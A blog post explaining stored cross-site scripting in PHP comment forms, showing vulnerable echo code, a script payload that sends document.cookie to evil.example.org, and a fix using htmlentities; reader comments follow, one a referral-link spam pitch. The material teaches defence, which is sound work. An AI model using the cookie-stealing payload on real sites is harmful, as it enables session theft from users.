Any application that displays input is at riskweb-based email applications, forums, guestbooks, and even blog aggregators. In fact, most web applications display input of some typethis is what makes them interesting, but it is also what places them at risk. If this input is not properly filtered and escaped, a cross-site scripting vulnerability exists.
Consider a web application that allows users to enter comments on each page. The following form can be used to facilitate this:
<form action="comment.php" method="POST" />
<p>Name: <input type="text" name="name" /><br />
Comment: <textarea name="comment" rows="10" cols="60"></textarea><br />
<input type="submit" value="Add Comment" /></p>
</form>
The application displays comments to other users who visit the page. For example, code similar to the following can be used to output a single comment ($comment) and corresponding name ($name):
<?php
echo "<p>$name writes:<br />";
echo "<blockquote>$comment</blockquote></p>";
?>
This approach places a significant amount of trust in the values of both $comment and $name. Imagine that one of them contained the following:
<script>
document.location =
'http://evil.example.org/steal.php?cookies=' +
document.cookie
</script>
If this comment is sent to your users, it is no different than if you had allowed someone else to add this bit of JavaScript to your source. Your users will involuntarily send their cookies (the ones associated with your application) to evil.example.org, and the receiving script (steal.php) can access all of the cookies in $_GET['cookies'].
This is a common mistake, and it is proliferated by many bad habits that have become commonplace. Luckily, the mistake is easy to avoid. Because the risk exists only when you output tainted, unescaped data, you can simply make sure that you filter input and escape output.
At the very least, you should use htmlentities( ) to escape any data that you send to the clientthis function converts all special characters into their HTML entity equivalents. Thus, any character that the browser interprets in a special way is converted to its HTML entity equivalent so that its original value is preserved.
The following replacement for the code to display a comment is a much safer approach:
<?php
$clean = array();
$html = array();
/* Filter Input ($name, $comment) */
$html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
$html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8');
echo "<p>{$html['name']} writes:<br />";
echo "<blockquote>{$html['comment']}</blockquote></p>";
?>
2 komentar:
Hi Gaara,
You have a very cool Blog…loved the content.
I have a question..
- “Seeking experienced programmer with following skills: strong browser UI background, specifically in JavaScript, AJAX, CSS, HTML. Also must have good system & software design skills, e.g. OOP. C++/C knowledge a plus”
I came across this site called Myndnet.com where u get paid if u answer this question.
It’s a platform for people to buy and sell Technology related information. Good money for people like us in the IT domain.
Here the link http://www.myndnet.com/login.jsp?referral=alpa83&channel=AA6
Sign up is free…check it out…
You can contact me at my id here for more questions : barot.alpa@gmail.com
Cheers :)
Alpa
huh the way it is explained here is really admirable....i found is very easy to understand.
PHP Programming
Post a Comment